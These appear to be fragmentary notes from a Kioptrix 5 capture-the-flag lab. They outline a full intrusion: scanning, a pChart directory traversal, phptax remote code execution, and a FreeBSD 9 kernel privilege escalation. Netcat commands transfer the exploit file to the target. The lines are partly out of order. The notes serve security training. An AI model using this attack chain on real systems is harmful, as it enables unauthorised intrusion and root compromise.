Kioptrix5
Scanning/Vuln/Enum
Vulnerability Searching
in pChart 2.1.3
it's vulnerable to directory traversal
We found pChart 2.1.3 on that URL
Directory structure is different
it's FreeBSD
Found a URL in meta on index page
unable to access 8080
Scanning
web-server scanning
nikto -h ip
nmap full scan
80 / 8080
dirb ip
let's try to see the Apache config file
PHP LFI vuln, dir traversal attack
success
Discovering
nmap -sn ip
8080 is running under different user agent
Gaining Access
Exploiting Vuln
set up listener
Vuln searching
it's vuln to remote code execution
Got shell
found phptax running
Local Enum
FreeBSD 9.0
no users
no wget
no python
accessing ip:8080
Getting Root
open connection on target
nc -nv [host-ip] [port] > exploit.c
set up a listener
nc -lvp 1234 < exploit.c
compile exploit; gcc exploit.c
put exploit in a file
use nc to send file to target
./a.out
Vuln Searching
FreeBSD 9 is vuln to kernel priv esc
Got Root